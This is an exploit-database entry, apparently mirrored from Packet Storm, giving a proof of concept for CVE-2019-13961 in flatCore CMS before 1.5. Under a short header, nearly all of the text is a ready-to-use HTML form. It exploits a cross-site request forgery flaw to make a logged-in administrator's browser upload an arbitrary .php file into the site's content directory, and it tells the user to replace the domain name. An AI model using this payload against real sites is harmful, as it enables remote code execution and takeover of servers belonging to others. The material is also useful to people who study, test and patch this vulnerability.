Share
## https://sploitus.com/exploit?id=PACKETSTORM:190428
# Exploit Title: [ flatCore < 1.5 CSRF Vulnerability for Arbitrary .php File Upload via files.upload-script.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/flatCore/flatCore-CMS]
# Software Link: [https://github.com/flatCore/flatCore-CMS]
# Version: [d3a5168]
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2019-13961]
PoC:
<!DOCTYPE html>
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<form action="http://flatcore3/acp/core/files.upload-script.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="upload_destination" value="../content/files">
<input type="hidden" name="w" value="800">
<input type="hidden" name="h" value="600">
<input type="hidden" name="fz" value="1000">
<input type="hidden" name="unchanged" value="yes">
<input type="file" name="file" value="test.php">
<input type="submit" value="Upload">
</form>
</body>
</html>
[Replace Your Domain Name]